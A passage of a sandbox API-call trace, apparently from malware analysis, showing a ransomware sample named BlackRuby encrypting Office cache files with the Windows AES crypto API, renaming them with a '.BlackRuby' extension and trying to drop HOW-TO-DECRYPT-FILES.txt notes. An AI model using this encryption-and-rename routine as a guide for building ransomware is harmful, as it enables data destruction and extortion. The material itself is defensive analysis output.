(hProv=0x37c708, dwFlags=0x0) returned 1 [0047.823] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.823] GetLastError () returned 0x0 [0047.823] SetErrorMode (uMode=0x1) returned 0x0 [0047.823] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\office64ww.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.824] GetLastError () returned 0xb7 [0047.824] GetFileType (hFile=0x184) returned 0x1 [0047.824] SetErrorMode (uMode=0x0) returned 0x1 [0047.824] GetFileType (hFile=0x184) returned 0x1 [0047.826] CloseHandle (hObject=0x184) returned 1 [0047.826] GetLastError () returned 0xb7 [0047.826] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml", lpFilePart=0x0) returned 0x4d [0047.826] GetLastError () returned 0xb7 [0047.826] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Encrypted_jKEC0S19LKzHCqhcxafZCD6kPrZZODrqlIJuqs.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Encrypted_jKEC0S19LKzHCqhcxafZCD6kPrZZODrqlIJuqs.BlackRuby", lpFilePart=0x0) returned 0x79 [0047.826] GetLastError () returned 0xb7 [0047.826] SetErrorMode (uMode=0x1) returned 0x0 [0047.826] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\office64ww.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf13501e0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xf13501e0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x24b56920, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x1350)) returned 1 [0047.826] GetLastError () returned 0xb7 [0047.826] SetErrorMode (uMode=0x0) returned 0x1 [0047.826] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Office64WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\office64ww.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Encrypted_jKEC0S19LKzHCqhcxafZCD6kPrZZODrqlIJuqs.BlackRuby" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\encrypted_jkec0s19lkzhcqhcxafzcd6kprzzodrqlijuqs.blackruby")) returned 1 [0047.826] GetLastError () returned 0xb7 [0047.827] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.827] GetLastError () returned 0xb7 [0047.827] SetErrorMode (uMode=0x1) returned 0x0 [0047.827] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.827] GetLastError () returned 0x5 [0047.828] SetErrorMode (uMode=0x0) returned 0x1 [0047.828] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\ose.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\ose.exe", lpFilePart=0x0) returned 0x46 [0047.828] GetLastError () returned 0x5 [0047.828] SetErrorMode (uMode=0x1) returned 0x0 [0047.828] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\ose.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\ose.exe"), fInfoLevelId=0x0, lpFileInformation=0x1cd8810 | out: lpFileInformation=0x1cd8810*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28ce9610, ftCreationTime.dwHighDateTime=0x1cb04aa, ftLastAccessTime.dwLowDateTime=0x28ce9610, ftLastAccessTime.dwHighDateTime=0x1cb04aa, ftLastWriteTime.dwLowDateTime=0xa5457070, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x24768)) returned 1 [0047.839] GetLastError () returned 0x5 [0047.839] SetErrorMode (uMode=0x0) returned 0x1 [0047.840] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.840] GetLastError () returned 0x5 [0047.840] SetErrorMode (uMode=0x1) returned 0x0 [0047.840] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.840] GetLastError () returned 0x5 [0047.841] SetErrorMode (uMode=0x0) returned 0x1 [0047.841] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\osetup.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\osetup.dll", lpFilePart=0x0) returned 0x49 [0047.841] GetLastError () returned 0x5 [0047.841] SetErrorMode (uMode=0x1) returned 0x0 [0047.841] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\osetup.dll"), fInfoLevelId=0x0, lpFileInformation=0x1cf67d4 | out: lpFileInformation=0x1cf67d4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31550620, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x31550620, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0xa4a84610, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x585768)) returned 1 [0047.841] GetLastError () returned 0x5 [0047.841] SetErrorMode (uMode=0x0) returned 0x1 [0047.842] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.842] GetLastError () returned 0x5 [0047.842] SetErrorMode (uMode=0x1) returned 0x0 [0047.842] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.842] GetLastError () returned 0x5 [0047.843] SetErrorMode (uMode=0x0) returned 0x1 [0047.843] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab", lpFilePart=0x0) returned 0x4b [0047.843] GetLastError () returned 0x5 [0047.843] SetErrorMode (uMode=0x1) returned 0x0 [0047.843] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\OWOW64WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\owow64ww.cab"), fInfoLevelId=0x0, lpFileInformation=0x1d146ac | out: lpFileInformation=0x1d146ac*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc98343a0, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xc98343a0, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0x9da7f9f0, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x16c2838)) returned 1 [0047.843] GetLastError () returned 0x5 [0047.843] SetErrorMode (uMode=0x0) returned 0x1 [0047.844] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.844] GetLastError () returned 0x5 [0047.844] SetErrorMode (uMode=0x1) returned 0x0 [0047.844] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.844] GetLastError () returned 0x5 [0047.845] SetErrorMode (uMode=0x0) returned 0x1 [0047.845] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\PidGenX.dll", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\PidGenX.dll", lpFilePart=0x0) returned 0x4a [0047.845] GetLastError () returned 0x5 [0047.845] SetErrorMode (uMode=0x1) returned 0x0 [0047.845] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\pidgenx.dll"), fInfoLevelId=0x0, lpFileInformation=0x1d32590 | out: lpFileInformation=0x1d32590*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe03a8a90, ftCreationTime.dwHighDateTime=0x1cb12b3, ftLastAccessTime.dwLowDateTime=0xe03a8a90, ftLastAccessTime.dwHighDateTime=0x1cb12b3, ftLastWriteTime.dwLowDateTime=0xa5457070, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x130b10)) returned 1 [0047.845] GetLastError () returned 0x5 [0047.845] SetErrorMode (uMode=0x0) returned 0x1 [0047.848] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.848] GetLastError () returned 0x5 [0047.848] SetErrorMode (uMode=0x1) returned 0x0 [0047.848] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.849] GetLastError () returned 0x5 [0047.849] SetErrorMode (uMode=0x0) returned 0x1 [0047.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpFilePart=0x0) returned 0x57 [0047.850] GetLastError () returned 0x5 [0047.850] SetErrorMode (uMode=0x1) returned 0x0 [0047.850] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), fInfoLevelId=0x0, lpFileInformation=0x1b53ed4 | out: lpFileInformation=0x1b53ed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x95261510, ftCreationTime.dwHighDateTime=0x1cb048a, ftLastAccessTime.dwLowDateTime=0x95261510, ftLastAccessTime.dwHighDateTime=0x1cb048a, ftLastWriteTime.dwLowDateTime=0xa5457070, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a)) returned 1 [0047.850] GetLastError () returned 0x5 [0047.850] SetErrorMode (uMode=0x0) returned 0x1 [0047.850] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.850] GetLastError () returned 0x5 [0047.850] SetErrorMode (uMode=0x1) returned 0x0 [0047.850] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.850] GetLastError () returned 0x5 [0047.851] SetErrorMode (uMode=0x0) returned 0x1 [0047.851] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\setup.exe", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\setup.exe", lpFilePart=0x0) returned 0x48 [0047.851] GetLastError () returned 0x5 [0047.851] SetErrorMode (uMode=0x1) returned 0x0 [0047.851] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\setup.exe"), fInfoLevelId=0x0, lpFileInformation=0x1b72094 | out: lpFileInformation=0x1b72094*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x32d6c420, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x32d6c420, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0xa4a5fc20, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x10cb78)) returned 1 [0047.852] GetLastError () returned 0x5 [0047.852] SetErrorMode (uMode=0x0) returned 0x1 [0047.852] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0047.852] GetLastError () returned 0x5 [0047.852] SetErrorMode (uMode=0x1) returned 0x0 [0047.852] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0047.852] GetLastError () returned 0x5 [0047.853] SetErrorMode (uMode=0x0) returned 0x1 [0047.853] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e98c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.853] GetLastError () returned 0x5 [0047.853] SetErrorMode (uMode=0x1) returned 0x0 [0047.853] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x1b901f0 | out: lpFileInformation=0x1b901f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80af0cc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80af0cc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0xa553c850, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x52fe)) returned 1 [0047.854] GetLastError () returned 0x5 [0047.854] SetErrorMode (uMode=0x0) returned 0x1 [0047.854] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.854] GetLastError () returned 0x5 [0047.854] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e828, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.854] GetLastError () returned 0x5 [0047.854] SetErrorMode (uMode=0x1) returned 0x0 [0047.854] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.855] GetLastError () returned 0x0 [0047.855] GetFileType (hFile=0x184) returned 0x1 [0047.855] SetErrorMode (uMode=0x0) returned 0x1 [0047.855] GetFileType (hFile=0x184) returned 0x1 [0047.855] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18eddc | out: lpFileSizeHigh=0x18eddc*=0x0) returned 0x52fe [0047.855] GetLastError () returned 0x0 [0047.855] ReadFile (in: hFile=0x184, lpBuffer=0x1b923fc, nNumberOfBytesToRead=0x52fe, lpNumberOfBytesRead=0x18ed84, lpOverlapped=0x0 | out: lpBuffer=0x1b923fc*, lpNumberOfBytesRead=0x18ed84*=0x52fe, lpOverlapped=0x0) returned 1 [0047.866] GetLastError () returned 0x0 [0047.866] CloseHandle (hObject=0x184) returned 1 [0047.866] GetLastError () returned 0x0 [0047.866] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e938, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.866] GetLastError () returned 0x0 [0047.866] SetErrorMode (uMode=0x1) returned 0x0 [0047.866] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edec | out: lpFileInformation=0x18edec*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80af0cc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80af0cc0, ftLastAccessTime.dwHighDateTime=0x1cb1486, ftLastWriteTime.dwLowDateTime=0xa553c850, ftLastWriteTime.dwHighDateTime=0x1d30235, nFileSizeHigh=0x0, nFileSizeLow=0x52fe)) returned 1 [0047.866] GetLastError () returned 0x0 [0047.866] SetErrorMode (uMode=0x0) returned 0x1 [0047.866] CryptAcquireContextW (in: phProv=0x18ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ed4c*=0x37c708) returned 1 [0047.867] GetLastError () returned 0x0 [0047.901] CryptImportKey (in: hProv=0x37c708, pbData=0x1bf6dd4, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ed28 | out: phKey=0x18ed28*=0x360da0) returned 1 [0047.901] GetLastError () returned 0x0 [0047.901] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.901] GetLastError () returned 0x0 [0047.908] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.908] GetLastError () returned 0x0 [0047.908] CryptDuplicateKey (in: hKey=0x360da0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ece4 | out: phKey=0x18ece4*=0x360ae0) returned 1 [0047.908] CryptContextAddRef (hProv=0x37c708, pdwReserved=0x0, dwFlags=0x0) returned 1 [0047.908] GetLastError () returned 0x0 [0047.908] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1c23e20*=0x1, dwFlags=0x0) returned 1 [0047.908] GetLastError () returned 0x0 [0047.908] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1c23dec, dwFlags=0x0) returned 1 [0047.908] GetLastError () returned 0x0 [0047.908] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c23e68*, pdwDataLen=0x18ed74*=0x53f0, dwBufLen=0x53f0 | out: pbData=0x1c23e68*, pdwDataLen=0x18ed74*=0x53f0) returned 1 [0047.908] GetLastError () returned 0x0 [0047.908] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c2e674*, pdwDataLen=0x18ed8c*=0x10, dwBufLen=0x10 | out: pbData=0x1c2e674*, pdwDataLen=0x18ed8c*=0x10) returned 1 [0047.908] GetLastError () returned 0x0 [0047.908] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c2e6a4*, pdwDataLen=0x18ed94*=0x0, dwBufLen=0x10 | out: pbData=0x1c2e6a4*, pdwDataLen=0x18ed94*=0x10) returned 1 [0047.908] GetLastError () returned 0x0 [0047.908] CryptDestroyKey (hKey=0x360da0) returned 1 [0047.908] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.909] CryptReleaseContext (hProv=0x37c708, dwFlags=0x0) returned 1 [0047.909] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e830, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.909] GetLastError () returned 0x0 [0047.909] SetErrorMode (uMode=0x1) returned 0x0 [0047.909] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0047.910] GetLastError () returned 0xb7 [0047.910] GetFileType (hFile=0x184) returned 0x1 [0047.910] SetErrorMode (uMode=0x0) returned 0x1 [0047.910] GetFileType (hFile=0x184) returned 0x1 [0047.912] CloseHandle (hObject=0x184) returned 1 [0047.912] GetLastError () returned 0xb7 [0047.912] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml", lpFilePart=0x0) returned 0x48 [0047.912] GetLastError () returned 0xb7 [0047.912] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Encrypted_cqsQJP9m7nstmRPPJhrvKOLNavu8D1ODjWgW1FlujNfACYF.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e954, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Encrypted_cqsQJP9m7nstmRPPJhrvKOLNavu8D1ODjWgW1FlujNfACYF.BlackRuby", lpFilePart=0x0) returned 0x82 [0047.912] GetLastError () returned 0xb7 [0047.912] SetErrorMode (uMode=0x1) returned 0x0 [0047.912] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-0000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-0000-0000000ff1ce}-c\\setup.xml"), fInfoLevelId=0x0, lpFileInformation=0x18edd4 | out: lpFileInformation=0x18edd4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x80af0cc0, ftCreationTime.dwHighDateTime=0x1cb1486, ftLastAccessTime.dwLowDateTime=0x80af0cc0, 